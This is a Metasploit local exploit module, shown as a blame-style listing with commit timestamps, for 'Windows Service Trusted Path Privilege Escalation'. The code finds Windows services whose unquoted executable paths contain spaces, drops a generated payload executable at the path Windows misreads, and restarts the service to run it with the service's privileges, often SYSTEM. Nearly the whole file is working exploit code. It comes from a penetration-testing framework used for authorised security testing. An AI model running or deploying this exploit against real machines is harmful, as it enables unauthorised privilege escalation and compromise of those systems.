2012-08-14 06:55:03 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-08-14 06:55:03 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/exploit/exe'
|
2012-08-14 06:55:03 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
2013-09-05 18:41:25 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
2013-12-17 01:46:45 +00:00
|
|
|
include Msf::Exploit::FileDropper
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Services
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Service Trusted Path Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a logic flaw due to how the lpApplicationName parameter
|
|
|
|
is handled. When the lpApplicationName contains a space, the file name is
|
|
|
|
ambiguous. Take this file path as example: C:\program files\hello.exe;
|
|
|
|
The Windows API will try to interpret this as two possible paths:
|
|
|
|
C:\program.exe, and C:\program files\hello.exe, and then execute all of them.
|
|
|
|
To some software developers, this is an unexpected behavior, which becomes a
|
|
|
|
security problem if an attacker is able to place a malicious executable in one
|
|
|
|
of these unexpected paths, sometimes escalate privileges if run as SYSTEM.
|
|
|
|
Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the
|
|
|
|
same problem.
|
|
|
|
|
|
|
|
The offensive technique is also described in Writing Secure Code (2nd Edition),
|
|
|
|
Chapter 23, in the section "Calling Processes Security" on page 676.
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
|
|
|
|
['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us'] #pg 676
|
|
|
|
],
|
|
|
|
'DisclosureDate' => "Oct 25 2001",
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'sinn3r'
|
|
|
|
],
|
|
|
|
'Platform' => [ 'win'],
|
|
|
|
'Targets' => [ ['Windows', {}] ],
|
2013-12-17 01:46:45 +00:00
|
|
|
'SessionTypes' => [ "meterpreter" ],
|
2013-09-05 18:41:25 +00:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
if enum_vuln_services.empty?
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
else
|
2014-01-24 18:08:23 +00:00
|
|
|
# Found service is running system
|
2013-09-05 18:41:25 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def enum_vuln_services(quick=false)
|
|
|
|
vuln_services = []
|
|
|
|
|
2014-02-19 00:24:23 +00:00
|
|
|
each_service do |service|
|
2013-12-15 03:00:29 +00:00
|
|
|
info = service_info(service[:name])
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
# Sometimes there's a null byte at the end of the string,
|
|
|
|
# and that can break the regex -- annoying.
|
2013-12-18 00:00:14 +00:00
|
|
|
if info[:path]
|
|
|
|
cmd = info[:path].strip
|
2013-09-05 18:41:25 +00:00
|
|
|
|
2013-12-18 00:00:14 +00:00
|
|
|
# Check path:
|
|
|
|
# - Filter out paths that begin with a quote
|
|
|
|
# - Filter out paths that don't have a space
|
|
|
|
next if cmd !~ /^[a-z]\:.+\.exe$/i
|
|
|
|
next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
|
2013-09-05 18:41:25 +00:00
|
|
|
|
2013-12-18 00:00:14 +00:00
|
|
|
vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
|
|
|
|
vuln_services << [service[:name], cmd]
|
2013-09-05 18:41:25 +00:00
|
|
|
|
2013-12-18 00:00:14 +00:00
|
|
|
# This process can be pretty damn slow.
|
|
|
|
# Allow the user to just find one, and get the hell out.
|
|
|
|
break if not vuln_services.empty? and quick
|
|
|
|
end
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return vuln_services
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
#
|
|
|
|
# Exploit the first service found
|
|
|
|
#
|
|
|
|
print_status("Finding a vulnerable service...")
|
|
|
|
svrs = enum_vuln_services(true)
|
2013-12-17 01:46:45 +00:00
|
|
|
|
|
|
|
fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
svr_name = svrs.first[0]
|
|
|
|
fpath = svrs.first[1]
|
|
|
|
exe_path = "#{fpath.split(' ')[0]}.exe"
|
2013-12-17 01:46:45 +00:00
|
|
|
print_status("Placing #{exe_path} for #{svr_name}")
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Drop the malicious executable into the path
|
|
|
|
#
|
2013-12-17 01:46:45 +00:00
|
|
|
exe = generate_payload_exe_service({:servicename=>svr_name})
|
2013-09-05 18:41:25 +00:00
|
|
|
print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
|
|
|
|
begin
|
|
|
|
write_file(exe_path, exe)
|
2013-12-17 01:46:45 +00:00
|
|
|
register_files_for_cleanup(exe_path)
|
2013-09-05 18:41:25 +00:00
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
# Can't write the file, can't go on
|
2013-12-17 01:46:45 +00:00
|
|
|
fail_with(Failure::Unknown, e.message)
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Run the service, let the Windows API do the rest
|
|
|
|
#
|
|
|
|
print_status("Launching service #{svr_name}...")
|
2013-12-17 01:46:45 +00:00
|
|
|
service_restart(svr_name)
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
2012-08-14 06:55:03 +00:00
|
|
|
|
|
|
|
end
|